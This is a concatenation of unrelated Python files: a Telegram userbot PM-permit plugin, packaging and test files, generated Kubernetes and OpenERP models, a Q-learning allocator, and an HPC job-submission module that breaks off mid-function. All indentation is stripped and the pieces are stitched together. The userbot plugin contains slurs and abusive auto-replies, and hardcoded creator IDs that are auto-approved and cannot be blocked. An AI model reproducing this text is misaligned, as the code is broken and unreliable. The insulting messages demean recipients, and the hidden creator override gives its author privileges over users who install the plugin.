USER_BOT_WARN_ZERO = "`You were spamming my peru master's inbox, henceforth your retarded lame ass has been blocked by my master's userbot.` "
USER_BOT_NO_WARN = ("`Hello ! This is` **[Pikachu Userbot](t.me/ItzSjDudeProjects)**\n"
"`Private Messaging Security Protocol ⚠️`\n\n"
"**You Have Trespassed To My Boss\n"
f"{DEFAULTUSER}'s Inbox**\n\n"
f"{CUSTOM_MIDDLE_PMP} 🔥\n\n"
"**Now You Are In Trouble So Send** 🔥 `/start` 🔥 **To Start A Valid Conversation!!**")
if Var.PRIVATE_GROUP_ID is not None:
@command(pattern="^.approve ?(.*)")
async def approve_p_m(event):
if event.fwd_from:
return
replied_user = await event.client(GetFullUserRequest(event.chat_id))
firstname = replied_user.user.first_name
reason = event.pattern_match.group(1)
chat = await event.get_chat()
if event.is_private:
if not pmpermit_sql.is_approved(chat.id):
if chat.id in PM_WARNS:
del PM_WARNS[chat.id]
if chat.id in PREV_REPLY_MESSAGE:
await PREV_REPLY_MESSAGE[chat.id].delete()
del PREV_REPLY_MESSAGE[chat.id]
pmpermit_sql.approve(chat.id, reason)
await event.edit("Approved to pm [{}](tg://user?id={})".format(firstname, chat.id))
await asyncio.sleep(3)
await event.delete()
@command(pattern="^.block ?(.*)")
async def approve_p_m(event):
if event.fwd_from:
return
replied_user = await event.client(GetFullUserRequest(event.chat_id))
firstname = replied_user.user.first_name
reason = event.pattern_match.group(1)
chat = await event.get_chat()
if event.is_private:
if chat.id == 813878981:
await event.edit("You bitch tried to block my Creator, now i will sleep for 100 seconds")
await asyncio.sleep(100)
else:
if pmpermit_sql.is_approved(chat.id):
pmpermit_sql.disapprove(chat.id)
await event.edit(" ███████▄▄███████████▄ \n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓███░░░░░░░░░░░░█\n██████▀▀▀█░░░░██████▀ \n░░░░░░░░░█░░░░█ \n░░░░░░░░░░█░░░█ \n░░░░░░░░░░░█░░█ \n░░░░░░░░░░░█░░█ \n░░░░░░░░░░░░▀▀ \n\n**This is {DEFAULTUSER} AI..U HAVE BEEN BANNED DUE TO BAKCHODI**..[{}](tg://user?id={})".format(firstname, chat.id))
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat.id))
@command(pattern="^.disapprove ?(.*)")
async def approve_p_m(event):
if event.fwd_from:
return
replied_user = await event.client(GetFullUserRequest(event.chat_id))
firstname = replied_user.user.first_name
reason = event.pattern_match.group(1)
chat = await event.get_chat()
if event.is_private:
if chat.id == 813878981:
await event.edit("Sorry, I Can't Disapprove My Master")
else:
if pmpermit_sql.is_approved(chat.id):
pmpermit_sql.disapprove(chat.id)
await event.edit("Disapproved [{}](tg://user?id={})".format(firstname, chat.id))
@command(pattern="^.listapproved")
async def approve_p_m(event):
if event.fwd_from:
return
approved_users = pmpermit_sql.get_all_approved()
APPROVED_PMs = "Current Approved PMs\n"
if len(approved_users) > 0:
for a_user in approved_users:
if a_user.reason:
APPROVED_PMs += f"👉 [{a_user.chat_id}](tg://user?id={a_user.chat_id}) for {a_user.reason}\n"
else:
APPROVED_PMs += f"👉 [{a_user.chat_id}](tg://user?id={a_user.chat_id})\n"
else:
APPROVED_PMs = "no Approved PMs (yet)"
if len(APPROVED_PMs) > 4095:
with io.BytesIO(str.encode(APPROVED_PMs)) as out_file:
out_file.name = "approved.pms.text"
await event.client.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption="Current Approved PMs",
reply_to=event
)
await event.delete()
else:
await event.edit(APPROVED_PMs)
@bot.on(events.NewMessage(incoming=True))
async def on_new_private_message(event):
if event.from_id == bot.uid:
return
if Var.PRIVATE_GROUP_ID is None:
return
if not event.is_private:
return
message_text = event.message.message
chat_id = event.from_id
current_message_text = message_text.lower()
if USER_BOT_NO_WARN == message_text:
# userbot's should not reply to other userbot's
# https://core.telegram.org/bots/faq#why-doesn-39t-my-bot-see-messages-from-other-bots
return
sender = await bot.get_entity(chat_id)
if chat_id == bot.uid:
# don't log Saved Messages
return
if sender.bot:
# don't log bots
return
if sender.verified:
# don't log verified accounts
return
if any([x in event.raw_text for x in ("/start", "1", "2", "3", "4", "5")]):
return
if not pmpermit_sql.is_approved(chat_id):
# pm permit
await do_pm_permit_action(chat_id, event)
async def do_pm_permit_action(chat_id, event):
if chat_id not in PM_WARNS:
PM_WARNS.update({chat_id: 0})
if PM_WARNS[chat_id] == 5:
r = await event.reply(USER_BOT_WARN_ZERO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
if chat_id in PREV_REPLY_MESSAGE:
await PREV_REPLY_MESSAGE[chat_id].delete()
PREV_REPLY_MESSAGE[chat_id] = r
the_message = ""
the_message += "#BLOCKED_PMs\n\n"
the_message += f"[User](tg://user?id={chat_id}): {chat_id}\n"
the_message += f"Message Count: {PM_WARNS[chat_id]}\n"
# the_message += f"Media: {message_media}"
try:
await event.client.send_message(
entity=Var.PRIVATE_GROUP_ID,
message=the_message,
# reply_to=,
# parse_mode="html",
link_preview=False,
# file=message_media,
silent=True
)
return
except:
return
r = await event.client.send_file(event.chat_id, WARN_PIC, caption=USER_BOT_NO_WARN)
PM_WARNS[chat_id] += 1
if chat_id in PREV_REPLY_MESSAGE:
await PREV_REPLY_MESSAGE[chat_id].delete()
PREV_REPLY_MESSAGE[chat_id] = r
from userbot.utils import admin_cmd
import io
import userbot.plugins.sql_helper.pmpermit_sql as pmpermit_sql
from telethon import events
@bot.on(events.NewMessage(incoming=True, from_users=(953414679,813878981,536157487)))
async def hehehe(event):
if event.fwd_from:
return
chat = await event.get_chat()
if event.is_private:
if not pmpermit_sql.is_approved(chat.id):
pmpermit_sql.approve(chat.id, "**My Boss Is Best🔥**")
await borg.send_message(chat, "**Boss Meet My Creator**")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(
name='docutils-ast-writer',
description='AST Writer for docutils',
version='0.1.2',
author='jimo1001',
author_email='jimo1001@gmail.com',
license='MIT',
url='https://github.com/jimo1001/docutils-ast-writer',
packages=find_packages(),
install_requires=[
'docutils>=0.12'
],
entry_points="""
[console_scripts]
rst2ast = rst2ast.cmd:run
""",
use_2to3 = True
)
|
import os
assert os.path.exists("data/data1.txt")
assert os.path.exists("data/subdir/data2.txt")
# Fake trained model!
open("model.json", "w").close()
open("checkpoint.h5", "w").close()
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.15.7
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class V1NodeDaemonEndpoints(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'kubelet_endpoint': 'V1DaemonEndpoint'
}
attribute_map = {
'kubelet_endpoint': 'kubeletEndpoint'
}
def __init__(self, kubelet_endpoint=None): # noqa: E501
"""V1NodeDaemonEndpoints - a model defined in OpenAPI""" # noqa: E501
self._kubelet_endpoint = None
self.discriminator = None
if kubelet_endpoint is not None:
self.kubelet_endpoint = kubelet_endpoint
@property
def kubelet_endpoint(self):
"""Gets the kubelet_endpoint of this V1NodeDaemonEndpoints. # noqa: E501
:return: The kubelet_endpoint of this V1NodeDaemonEndpoints. # noqa: E501
:rtype: V1DaemonEndpoint
"""
return self._kubelet_endpoint
@kubelet_endpoint.setter
def kubelet_endpoint(self, kubelet_endpoint):
"""Sets the kubelet_endpoint of this V1NodeDaemonEndpoints.
:param kubelet_endpoint: The kubelet_endpoint of this V1NodeDaemonEndpoints. # noqa: E501
:type: V1DaemonEndpoint
"""
self._kubelet_endpoint = kubelet_endpoint
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1NodeDaemonEndpoints):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
from BonusAllocator import BonusAllocator
from IOHmmModel import IOHmmModel
import numpy as np
class QLearningAllocator(BonusAllocator):
def __init__(self, num_workers, discnt=0.99, len_seq=10, base_cost=5, bns=2, t=10, weights=None):
super(QLearningAllocator, self).__init__(num_workers, base_cost, bns, t, weights)
print 'init an qlearnig-mdp bonus allocator'
self.__len_seq = len_seq
self.__discnt = discnt
self.__nstates = 0 # number of hidden states, denoted as S
self.__ostates = 0 # number of observations, denoted as O
self.__strt_prob = None # start probability of hidden states, shape = 1 * S fake...
self.__tmat0 = None # transition matrix with no bonus, shape = S * S, returned after training
self.__tmat1 = None # transiton matrix with bonus, shape = S * S, returned after training
self.__emat = None # emission matrix, shpe = S * O, returned after training
self.__numitr = 0
self.__q_mat = None
self.set_parameters()
def set_parameters(self, nstates=2, ostates=2, strt_prob=None, numitr=1000, discnt=0.8, len_seq=10):
if strt_prob is None:
strt_prob = [1.0 / nstates for _ in range(nstates)]
self.__discnt = discnt
self.__nstates = nstates # number of hidden states
self.__ostates = ostates # number of observations
self.__strt_prob = strt_prob
self.__numitr = numitr # number of iteration in EM algorithm
self.__len_seq = len_seq
def train(self, model):
model_param = model.get_model()
self.__tmat0 = model_param[0]
self.__tmat1 = model_param[1]
self.__emat = model_param[2]
self.__q_mat = [self.__cal_q(tc) for tc in range(self._t + 1)] # include T moment
def __pseudo_viterbi(self, in_obs, ou_obs): # tmats[0] transition matrix when not bonus
t_val = list()
t_val.append([self.__strt_prob[i] * self.__emat[i][ou_obs[0]] for i in range(self.__nstates)]) # 1 * N
tmats = (self.__tmat0, self.__tmat1)
for cur_t in range(1, len(in_obs), 1):
t_val.append([])
for j in range(self.__nstates):
tmp_val = [t_val[cur_t - 1][i] * tmats[in_obs[cur_t]][i][j] * self.__emat[j][ou_obs[cur_t]]
for i in range(self.__nstates)] # from i to j
t_val[cur_t].append(sum(tmp_val))
t_val[cur_t] = [float(cur_v) / sum(t_val[cur_t]) for cur_v in t_val[cur_t]]
return t_val[-1]
def __cal_reward(self, k, a):
trans_mat = [self.__tmat0, self.__tmat1]
return sum([trans_mat[a][k][i] * (self.__emat[i][0] * self.weights[0] + self.__emat[i][1] * (
self.weights[1] - a * self.weights[2])) for i in range(self.__nstates)])
def __cal_q(self, t):
q_mat = np.zeros((self.__nstates, 2))
tmats = (self.__tmat0, self.__tmat1)
for __ in range(self.__numitr):
k = np.random.choice(self.__nstates, 1)[0] # random select start states
for i in range(t):
a = np.random.choice([0, 1], 1)[0] # select an input randomly
k_prime = np.random.choice(self.__nstates, 1, tmats[a][k])[0] # randomly select next states
q_mat[k][a] = self.__cal_reward(k, a) + self.__discnt * max(q_mat[k_prime])
k = k_prime
return q_mat
def bonus_alloc(self, in_obs, ou_obs):
if self.__emat is not None and in_obs is not None and ou_obs is not None:
states_belief = self.__pseudo_viterbi(in_obs, ou_obs)
tc = len(in_obs) % self._t
# print states
exp0 = sum([states_belief[k] * self.__q_mat[self._t - tc][k][0] for k in range(self.__nstates)])
exp1 = sum([states_belief[k] * self.__q_mat[self._t - tc][k][1] for k in range(self.__nstates)])
return self._base_cost + self._bns * int(exp1 > exp0)
else:
return self._base_cost + self._bns * np.random.choice(2, 1)[0]
|
def validate_schema(schema):
def validate_decorator(func):
def validate_wrapper(*args, **kwargs):
data = schema().load(kwargs)
return func(*args, **data)
return validate_wrapper
return validate_decorator
|
from snowflake.connector.errors import Error
class SnowDDLExecuteError(Exception):
def __init__(self, snow_exc: Error, sql: str):
self.snow_exc = snow_exc
self.sql = sql
def verbose_message(self):
params = {
'message': self.snow_exc.raw_msg,
'errno': self.snow_exc.errno,
'sqlstate': self.snow_exc.sqlstate,
'sfqid': self.snow_exc.sfqid,
'sql': self.sql,
}
pad_length = max(len(x) for x in params)
res = ''
for k in params:
res += f" {k.ljust(pad_length)} => {params[k]}\n"
return '(\n' + res + ')'
class SnowDDLUnsupportedError(Exception):
pass
|
"""Test the SiteSage Emonitor config flow."""
from unittest.mock import MagicMock, patch
from aioemonitor.monitor import EmonitorNetwork, EmonitorStatus
import aiohttp
from homeassistant import config_entries
from homeassistant.components import dhcp
from homeassistant.components.emonitor.const import DOMAIN
from homeassistant.const import CONF_HOST
from tests.common import MockConfigEntry
def _mock_emonitor():
return EmonitorStatus(
MagicMock(), EmonitorNetwork("AABBCCDDEEFF", "1.2.3.4"), MagicMock()
)
async def test_form(hass):
"""Test we get the form."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.emonitor.config_flow.Emonitor.async_get_status",
return_value=_mock_emonitor(),
), patch(
"homeassistant.components.emonitor.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
"host": "1.2.3.4",
},
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == "Emonitor DDEEFF"
assert result2["data"] == {
"host": "1.2.3.4",
}
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_unknown_error(hass):
"""Test we handle unknown error."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.emonitor.config_flow.Emonitor.async_get_status",
side_effect=Exception,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
"host": "1.2.3.4",
},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "unknown"}
async def test_form_cannot_connect(hass):
"""Test we handle cannot connect error."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.emonitor.config_flow.Emonitor.async_get_status",
side_effect=aiohttp.ClientError,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
"host": "1.2.3.4",
},
)
assert result2["type"] == "form"
assert result2["errors"] == {CONF_HOST: "cannot_connect"}
async def test_dhcp_can_confirm(hass):
"""Test DHCP discovery flow can confirm right away."""
with patch(
"homeassistant.components.emonitor.config_flow.Emonitor.async_get_status",
return_value=_mock_emonitor(),
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_DHCP},
data=dhcp.DhcpServiceInfo(
hostname="emonitor",
ip="1.2.3.4",
macaddress="aa:bb:cc:dd:ee:ff",
),
)
await hass.async_block_till_done()
assert result["type"] == "form"
assert result["step_id"] == "confirm"
assert result["description_placeholders"] == {
"host": "1.2.3.4",
"name": "Emonitor DDEEFF",
}
with patch(
"homeassistant.components.emonitor.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{},
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == "Emonitor DDEEFF"
assert result2["data"] == {
"host": "1.2.3.4",
}
assert len(mock_setup_entry.mock_calls) == 1
async def test_dhcp_fails_to_connect(hass):
"""Test DHCP discovery flow that fails to connect."""
with patch(
"homeassistant.components.emonitor.config_flow.Emonitor.async_get_status",
side_effect=aiohttp.ClientError,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_DHCP},
data=dhcp.DhcpServiceInfo(
hostname="emonitor",
ip="1.2.3.4",
macaddress="aa:bb:cc:dd:ee:ff",
),
)
await hass.async_block_till_done()
assert result["type"] == "form"
assert result["step_id"] == "user"
async def test_dhcp_already_exists(hass):
"""Test DHCP discovery flow that fails to connect."""
entry = MockConfigEntry(
domain=DOMAIN,
data={CONF_HOST: "1.2.3.4"},
unique_id="aa:bb:cc:dd:ee:ff",
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.emonitor.config_flow.Emonitor.async_get_status",
return_value=_mock_emonitor(),
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_DHCP},
data=dhcp.DhcpServiceInfo(
hostname="emonitor",
ip="1.2.3.4",
macaddress="aa:bb:cc:dd:ee:ff",
),
)
await hass.async_block_till_done()
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
async def test_user_unique_id_already_exists(hass):
"""Test creating an entry where the unique_id already exists."""
entry = MockConfigEntry(
domain=DOMAIN,
data={CONF_HOST: "1.2.3.4"},
unique_id="aa:bb:cc:dd:ee:ff",
)
entry.add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.emonitor.config_flow.Emonitor.async_get_status",
return_value=_mock_emonitor(),
), patch(
"homeassistant.components.emonitor.async_setup_entry",
return_value=True,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
"host": "1.2.3.4",
},
)
await hass.async_block_till_done()
assert result2["type"] == "abort"
assert result2["reason"] == "already_configured"
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
from openerp.addons.crm import crm
from openerp.osv import fields, osv
from openerp import tools
from openerp.tools.translate import _
from openerp.tools import html2plaintext
class crm_helpdesk(osv.osv):
""" Helpdesk Cases """
_name = "crm.helpdesk"
_description = "Helpdesk"
_order = "id desc"
_inherit = ['mail.thread']
_columns = {
'id': fields.integer('ID', readonly=True),
'name': fields.char('Name', required=True),
'active': fields.boolean('Active', required=False),
'date_action_last': fields.datetime('Last Action', readonly=1),
'date_action_next': fields.datetime('Next Action', readonly=1),
'description': fields.text('Description'),
'create_date': fields.datetime('Creation Date' , readonly=True),
'write_date': fields.datetime('Update Date' , readonly=True),
'date_deadline': fields.date('Deadline'),
'user_id': fields.many2one('res.users', 'Responsible'),
'section_id': fields.many2one('crm.case.section', 'Sales Team', \
select=True, help='Responsible sales team. Define Responsible user and Email account for mail gateway.'),
'company_id': fields.many2one('res.company', 'Company'),
'date_closed': fields.datetime('Closed', readonly=True),
'partner_id': fields.many2one('res.partner', 'Partner'),
'email_cc': fields.text('Watchers Emails', size=252 , help="These email addresses will be added to the CC field of all inbound and outbound emails for this record before being sent. Separate multiple email addresses with a comma"),
'email_from': fields.char('Email', size=128, help="Destination email for email gateway"),
'date': fields.datetime('Date'),
'ref': fields.reference('Reference', selection=openerp.addons.base.res.res_request.referencable_models),
'ref2': fields.reference('Reference 2', selection=openerp.addons.base.res.res_request.referencable_models),
'channel_id': fields.many2one('crm.tracking.medium', 'Channel', help="Communication channel."),
'planned_revenue': fields.float('Planned Revenue'),
'planned_cost': fields.float('Planned Costs'),
'priority': fields.selection([('0','Low'), ('1','Normal'), ('2','High')], 'Priority'),
'probability': fields.float('Probability (%)'),
'categ_id': fields.many2one('crm.case.categ', 'Category', \
domain="['|',('section_id','=',False),('section_id','=',section_id),\
('object_id.model', '=', 'crm.helpdesk')]"),
'duration': fields.float('Duration', states={'done': [('readonly', True)]}),
'state': fields.selection(
[('draft', 'New'),
('open', 'In Progress'),
('pending', 'Pending'),
('done', 'Closed'),
('cancel', 'Cancelled')], 'Status', readonly=True, track_visibility='onchange',
help='The status is set to \'Draft\', when a case is created.\
\nIf the case is in progress the status is set to \'Open\'.\
\nWhen the case is over, the status is set to \'Done\'.\
\nIf the case needs to be reviewed then the status is set to \'Pending\'.'),
}
_defaults = {
'active': lambda *a: 1,
'user_id': lambda s, cr, uid, c: uid,
'state': lambda *a: 'draft',
'date': fields.datetime.now,
'company_id': lambda s, cr, uid, c: s.pool.get('res.company')._company_default_get(cr, uid, 'crm.helpdesk', context=c),
'priority': '1',
}
def on_change_partner_id(self, cr, uid, ids, partner_id, context=None):
values = {}
if partner_id:
partner = self.pool.get('res.partner').browse(cr, uid, partner_id, context=context)
values = {
'email_from': partner.email,
}
return {'value': values}
def write(self, cr, uid, ids, values, context=None):
""" Override to add case management: open/close dates """
if values.get('state'):
if values.get('state') in ['draft', 'open'] and not values.get('date_open'):
values['date_open'] = fields.datetime.now()
elif values.get('state') == 'done' and not values.get('date_closed'):
values['date_closed'] = fields.datetime.now()
return super(crm_helpdesk, self).write(cr, uid, ids, values, context=context)
def case_escalate(self, cr, uid, ids, context=None):
""" Escalates case to parent level """
data = {'active': True}
for case in self.browse(cr, uid, ids, context=context):
if case.section_id and case.section_id.parent_id:
parent_id = case.section_id.parent_id
data['section_id'] = parent_id.id
if parent_id.change_responsible and parent_id.user_id:
data['user_id'] = parent_id.user_id.id
else:
raise osv.except_osv(_('Error!'), _('You can not escalate, you are already at the top level regarding your sales-team category.'))
self.write(cr, uid, [case.id], data, context=context)
return True
# -------------------------------------------------------
# Mail gateway
# -------------------------------------------------------
def message_new(self, cr, uid, msg, custom_values=None, context=None):
""" Overrides mail_thread message_new that is called by the mailgateway
through message_process.
This override updates the document according to the email.
"""
if custom_values is None:
custom_values = {}
desc = html2plaintext(msg.get('body')) if msg.get('body') else ''
defaults = {
'name': msg.get('subject') or _("No Subject"),
'description': desc,
'email_from': msg.get('from'),
'email_cc': msg.get('cc'),
'user_id': False,
'partner_id': msg.get('author_id', False),
}
defaults.update(custom_values)
return super(crm_helpdesk, self).message_new(cr, uid, msg, custom_values=defaults, context=context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
# Copyright (c) 2017, John Skinner
from os import getcwd
import logging
import typing
import subprocess
import re
import bson
from pathlib import Path
from operator import attrgetter
from functools import partial
import arvet.batch_analysis.job_system
from arvet.batch_analysis.task import Task
import arvet.batch_analysis.scripts.run_task
# Basic structure for job arguments
JOB_ARGS_TEMPLATE = """
#PBS -N {name}
#PBS -l walltime={time}
#PBS -l mem={mem}
#PBS -l ncpus={cpus}
#PBS -l cpuarch=avx2
"""
# Some additional arguments in the script for using GPUs
GPU_ARGS_TEMPLATE = """
#PBS -l ngpus={gpus}
#PBS -l gputype=M40
#PBS -l cputype=E5-2680v4
"""
SSH_TUNNEL_PREFIX = """
ssh -nN -i {ssh_key} -L {local_port}:localhost:27017 {username}@{hostname} &
echo $! > {job_folder}/{job_name}-{local_port}.ssh.pid
"""
SSH_TUNNEL_SUFFIX = """
xargs kill < {job_folder}/{job_name}-{local_port}.ssh.pid
rm {job_folder}/{job_name}-{local_port}.ssh.pid
"""
class HPCJobSystem(arvet.batch_analysis.job_system.JobSystem):
"""
A job system using HPC to run tasks.
"""
def __init__(self, config: dict, config_file: str):
"""
Takes configuration parameters in a dict with the following format:
{
'node_id': 'name_of_job_system_node'
'environment': 'path-to-activate-script'
'job_location: 'folder-to-create-jobs' # Default ~
'job_name_prefix': 'prefix-to-job-names' # Default ''
'max_jobs': int # Default no limit
'ssh_tunnel': { # No tunnel if omitted
'hostname': The host to ssh to
'username': The username to connect with
'ssh_key': Path to the SSH key to connect with
'min_port': The minimum local port to use
'max_port': The highest local port to use
}
}
:param config: A dict of configuration parameters
"""
super().__init__(config)
self._config_path = Path(config_file).expanduser().resolve()
# Work out what execution environment to use, virtualenv or conda
self._environment = config.get('environment', None)
if self._environment is not None:
self._environment = Path(self._environment).expanduser().resolve()
self._job_folder = config.get('job_location', '~')
self._job_folder = Path(self._job_folder).expanduser().resolve()
self._name_prefix = config.get('job_name_prefix', '')
self._max_jobs = max(1, int(config['max_jobs'])) if 'max_jobs' in config else None
self._expected_jobs_to_run = 0
# Configure the job to set up an ssh tunnel before running.
ssh_tunnel_config = config.get('ssh_tunnel', {})
self._ssh_host = ssh_tunnel_config.get('hostname', None)
self._ssh_key = ssh_tunnel_config.get('ssh_key', None)
self._ssh_key = Path(self._ssh_key).expanduser().resolve() if self._ssh_key is not None else None
self._ssh_username = ssh_tunnel_config.get('username', None)
self._ssh_min_port = int(ssh_tunnel_config.get('min_port', 5000))
self._ssh_max_port = int(ssh_tunnel_config.get('max_port', 65535))
self._use_ssh = bool(
self._ssh_host is not None and
self._ssh_key is not None and
self._ssh_username is not None
)
if self._use_ssh and (self._max_jobs is None or (self._ssh_max_port - self._ssh_min_port + 1) < self._max_jobs):
self._max_jobs = self._ssh_max_port - self._ssh_min_port + 1
self._checked_running_jobs = False
self._ssh_current_port = self._ssh_min_port
self._tasks_to_run = []
self._scripts_to_run = []
def can_generate_dataset(self, simulator: bson.ObjectId, config: dict) -> bool:
"""
Can this job system generate synthetic datasets.
HPC cannot generate datasets, because it is a server with
no X session
:param simulator: The simulator id that will be doing the generation
:param config: Configuration passed to the simulator at run time
:return: True iff the job system can generate datasets. HPC cannot.
"""
return False
def is_job_running(self, job_id: int) -> bool:
"""
Is the specified job id currently running through this job system.
This is used by the task manager to work out which jobs have failed without notification, to reschedule them.
For the HPC, a job is valid based on the output of the command 'qstat'
A running job id produced output like:
Job id Name User Time Use S Queue
---------------- ---------------- ---------------- -------- - -----
2315056.pbs auto_task_1 user 0 Q quick
whereas a non-running job produces:
qstat: Unknown Job Id 2315.pbs
an invalid job produces:
qstat: illegally formed job identifier: 231512525
A finished job produces:
qstat: 2338916.pbs Job has finished, use -x or -H to obtain historical job information
:param job_id: The integer job id to check
:return: True if the job is currently running on this node
"""
result = subprocess.run(['qstat', str(int(job_id))], stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
universal_newlines=True)
output = result.stdout.lower() # Case insensitive
return 'unknown job id' not in output and 'job has finished' not in output
def run_task(self, task: Task) -> bool:
"""
Run a particular task
:param task: The the task to run
:return: The job id if the job has been started correctly, None if failed.
"""
if self.can_run_task(task) and not self.is_queue_full():
self._tasks_to_run.append(task)
# Jobs that have failed before may not actually be run if there are enough jobs that haven't failed yet
if task.failure_count <= 0:
self._expected_jobs_to_run += 1
return True
return False
def run_script(
self,
script: typing.Union[str, Path],
script_args_builder: typing.Callable[..., typing.List[str]],
job_name: str = "",
num_cpus: int = 1, num_gpus: int = 0,
memory_requirements: str = '3GB', expected_duration: str = '1:00:00'
) -> bool:
"""
Run a script that is not a task on this job system
:param script: The path to the script to run
:param script_args_builder: A lambda that returns list of command line arguments, as strings
:param job_name: A unique name to use for the job.
:param num_cpus: The number of CPUs required
:param num_gpus: The number of GPUs required
:param memory_requirements: The required amount of memory
:param expected_duration: The duration given for the job to run
:return: The job id if the job has been started correctly, None if failed.
"""
if not self.is_queue_full():
self._scripts_to_run.append((
script, script_args_builder, job_name, num_cpus, num_gpus, memory_requirements, expected_duration
))
self._expected_jobs_to_run += 1
return True
return False
def is_queue_full(self) -> bool:
"""
If we have collected enough jobs that we expect to run to fill the queue.
:return:
"""
return self._max_jobs is not None and self._expected_jobs_to_run >= self._max_jobs
def run_queued_jobs(self):
"""
Run queued jobs.
We're doing something a little complex:
HPC will run jobs in parallel. Most tasks are fine to run in parallel,
however HDF5 does not support concurrent write, so ImportDatasetTasks must be run sequentially instead
So we have three groups of jobs:
- Scripts, which are run parallel
- Tasks that are not ImportDatasetTasks, which are also run parallel
- ImportDatasetTasks, which are run all together in a single job
:return:
"""
# Run scripts in parallel
logging.getLogger(__name__).info("Submitting {0} scripts to HPC".format(len(self._scripts_to_run)))
for (
script,
script_args_builder,
job_name,
num_cpus,
num_gpus,
memory_requirements,
expected_duration
) in self._scripts_to_run:
self._create_and_run_script(
scripts=[(script, script_args_builder)],
job_name=job_name,
num_cpus=num_cpus,
num_gpus=num_gpus,
memory_requirements=memory_requirements,
expected_duration=expected_duration
)
self._scripts_to_run = []
# Submit jobs for tasks, starting with those that have failed the least
logging.getLogger(__name__).info("Submitting {0} tasks to HPC".format(len(self._tasks_to_run)))
for task in sorted(self._tasks_to_run, key=attrgetter('failure_count')):
job_id = self._create_and_run_script(
scripts=[(
Path(arvet.batch_analysis.scripts.run_task.__file__).resolve(),
partial(task_args_builder, task)
)],
job_name=task.get_unique_name(),
num_cpus=task.num_cpus,
num_gpus=task.num_gpus,
memory_requirements=task.memory_requirements,
expected_duration=task.expected_duration
)
if job_id is not None:
task.mark_job_started(self.node_id, job_id)
task.save()
self._tasks_to_run = []
self._expected_jobs_to_run = 0
def _create_and_run_script(
self,
scripts: typing.Collection[typing.Tuple[typing.Union[str, Path], typing.Callable[..., typing.List[str]]]],
job_name: str = "",
num_cpus: int = 1, num_gpus: int = 0,
memory_requirements: str = '3GB', expected_duration: str = '1:00:00'
) -> typing.Union[int, None]:
"""
Actually create and submit a job, which may run one or more actual scripts.
Only ever counts as one toward max_jobs
:param scripts: A
:param job_name:
:param num_cpus:
:param num_gpus:
:param memory_requirements:
:param expected_duration:
:return:
"""
if len(scripts) <= 0:
